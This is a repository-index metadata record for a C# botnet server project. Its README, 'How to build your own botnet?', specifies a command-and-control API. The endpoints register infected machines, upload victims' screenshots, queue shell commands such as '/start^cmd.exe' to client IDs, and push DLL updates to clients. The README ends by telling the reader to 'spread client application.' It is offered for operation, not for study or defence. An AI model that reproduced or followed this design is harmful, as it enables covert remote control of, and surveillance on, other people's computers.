{"id":17866718,"url":"https://github.com/zerumi/botnet-server","last_synced_at":"2025-10-12T02:16:06.072Z","repository":{"id":43646715,"uuid":"221496426","full_name":"Zerumi/BotNet-Server","owner":"Zerumi","description":"C# .Net BotNet Server and everything about it","archived":false,"fork":false,"pushed_at":"2025-01-07T08:59:29.000Z","size":85103,"stargazers_count":10,"open_issues_count":1,"forks_count":3,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-03T18:51:23.778Z","etag":null,"topics":["botnet","csharp"],"latest_commit_sha":null,"homepage":"https://botnet-api.glitch.me","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"isc","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Zerumi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-11-13T15:52:44.000Z","updated_at":"2025-02-03T06:33:17.000Z","dependencies_parsed_at":"2023-01-30T05:00:58.906Z","dependency_job_id":null,"html_url":"https://github.com/Zerumi/BotNet-Server","commit_stats":null,"previous_names":[],"tags_count":9,"template":false,"template_full_name":null,"purl":"pkg:github/Zerumi/BotNet-Server","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zerumi%2FBotNet-Server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zerumi%2FBotNet-Server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zerumi%2FBotNet-Server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zerumi%2FBotNet-Server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Zerumi","download_url":"https://codeload.github.com/Zerumi/BotNet-Server/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Zerumi%2FBotNet-Server/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270684431,"owners_count":24627796,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-16T02:00:11.002Z","response_time":91,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["botnet","csharp"],"created_at":"2024-10-28T09:38:43.490Z","updated_at":"2025-10-12T02:16:06.000Z","avatar_url":"https://github.com/Zerumi.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# BotNet-Server\nC# .Net BotNet Server and everything about it\n\n# Check my new project: https://github.com/Zerumi/AMWE-Server\n\n\nHow to build your own botnet?\n- Create API\n- - You can use our API example, wrote on JS, or create yourself API\n- - - Warning! If you want to create your API, you must realize this methods (Every responses have JSON parsing)\n- - - Example Response (Type) is a Types of BotNet Server UI\n- - - - post /api/v1/screens/:id\n- - - - - Example Request: /api/v1/screens/0\n- - - - - Example Request Body: ScreenByte without sid\n- - - - - Example Response: sid for next request (uint)\n- - - - post /api/v1/screens/:id/:sid\n- - - - - Example Request: /api/v1/screens/0/0\n- - - - - Example Request Body: ScreenByte without sid\n- - - - - Example Response: void\n- - - - get /api/v1/screens/:id\n- - - - - Example Request: /api/v1/screens/0\n- - - - - Example Response: {\"id\":0, \"screens\":[{\"sid\":0, \"bytes\":[0,0,0,0,0,0...]}]} (Screen)\n- - - - get /api/v1/client\n- - - - - Example Request: /api/v1/client\n- - - - - Example Response: [{\"id\":0,\"nameofpc\":\"PizhikCoder\"},{\"id\":1,\"nameofpc\":\"Zerumi\"}] (IP[])\n- - - - get /api/v1/messages\n- - - - - Example Request: /api/v1/messages\n- - - - - Example Response: 1 (Uint) // count of messages\n- - - - get /api/v1/responses\n- - - - - Example Request: /api/v1/responses\n- - - - - Example Response: [{\"id\":0, \"response\":[{\"rid\":0,\"response\":\"Done! Time used: 0ms\"}]}, {...}] (Responses[])\n- - - - get /api/v1/messages/:id\n- - - - - Example Request: /api/v1/messages/0\n- - - - - Example Response: {\"id\":0,\"command\":\"/start^cmd.exe\",\"ids\":[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]} (Message)\n- - - - post /api/v1/client\n- - - - - Example Request: /api/v1/client\n- - - - - Example Request Body: IP without ID\n- - - - - Example Response: 0 (UInt) // Your ID in system\n- - - - post /api/v1/messages\n- - - - - Example Request: /api/v1/messages\n- - - - - Example Request Body: Message without ID\n- - - - - Example Response: {\"id\":0,\"command\":\"/start^cmd.exe\",\"ids\":[\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]} (Message) // but this response is useless\n- - - - delete /api/v1/messages\n- - - - - Example Request: /api/v1/messages\n- - - - - Example Response: void\n- - - - get /api\n- - - - - Example Request: /api\n- - - - - Example Response: {\"uri\":\" http://botnet-api.glitch.me/ \",\"version\":1,\"port\":\"3000\",\"environment\":\"development\",\"clients\":1,\"messages\":1} (Info) // If version = 2, address in ApiRequest will be /api/v2/..., be careful\n- - - - get /api/v1/responses/:id/:rid\n- - - - - Example Request: /api/v1/responses/0/0\n- - - - - Example Response: {\"rid\":0, \"response\": \"Done! Time used 0ms\"} (Response)\n- - - - post /api/v1/responses/:id\n- - - - - Example Request: /api/v1/responses/0\n- - - - - Example Response: 1 (UInt) // count of responses\n- - - - delete /api/v1/responses\n- - - - - Example Request: /api/v1/responses\n- - - - - Example Response: void\n- - - - delete /api/v1/client/:id\n- - - - - Example Request: /api/v1/client/0\n- - - - - Example Response: void\n- - - - get /api/v1/admin/:password\n- - - - - Example Request: /api/v1/admin/qwerty\n- - - - - Example Response: false (Boolean)\n- - - - get /sandbox\n- - - - - Example Request: /sandbox\n- - - - - Example Response: \"Who are you?\" (String)\n- - - - get /sandbox/:id\n- - - - - Example Request: /sandbox/0\n- - - - - Example Response: 0 (UInt)\n- - - - post /api/v1/sandbox\n- - - - - Example Request: /api/v1/sandbox\n- - - - - Request Body: \"Make a coffee\" (String)\n- - - - - Example Response: Error (code 418)\n- - - - delete /sandbox\n- - - - - Example Request: /sandbox\n- - - - - Example Response: \"Deleted!\" (String)\n- - - - post /api/v1/update\n- - - - - Example Request: /api/v1/update\n- - - - - Example Request Body: UpdateFile\n- - - - - Example Response: void\n- - - - post /api/v1/nextupdate\n- - - - - Example Request: /api/v1/nextupdate\n- - - - - Example Request Body: UpdateFile without filename\n- - - - - Example Response: void\n- - - - get /api/v1/update\n- - - - - Example Request: /api/v1/update\n- - - - - Example Response: {\"filename\":\"CommandHandler.dll\",\"filebytes\":[0,0,0,0,0,0,0,0...]} (UpdateFile)\n- - - - get /api/v1/support/versions/:version\n- - - - - Example Request: /api/v1/support/versions/1.6.0.0\n- - - - - Example Response: {\"version\":\"1.6.0.0\",\"isDeprecated\":false,\"isUpdateNeeded\":false,\"isNotLatest\":false,\"cmdlib\":[\"2.1.0.0\"],\"m3md2\":[\"1.3.0.0\"],\"m3md2_startup\":[\"1.2.0.0\"]} (VerifyVersion)\n- - Download API on a server\n- Create MineWeb API\n- - You can use our API example, wrote on JS, or create yourself API\n- - - Warning! If you want to create your API, you must realize this methods (Every responses have JSON parsing)\n- - - - get /scripts/:script\n- - - - post /scripts/:script\n- - - - delete /scripts/:script\n- - Download API on a server\n- Setup Client\n- - Example Client for http://botnet-api.glitch.me/ here: https://github.com/PizhikCoder/HttpClient\n- Setup Server UI\n- - In Login Screen write server address and password\n- - For change MineWeb address, go \"Manage\" -\u003e \"Settings\" -\u003e \"API\", and write MineWeb API address here\nAll right. Now you need to spread client application.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzerumi%2Fbotnet-server","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzerumi%2Fbotnet-server","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzerumi%2Fbotnet-server/lists"}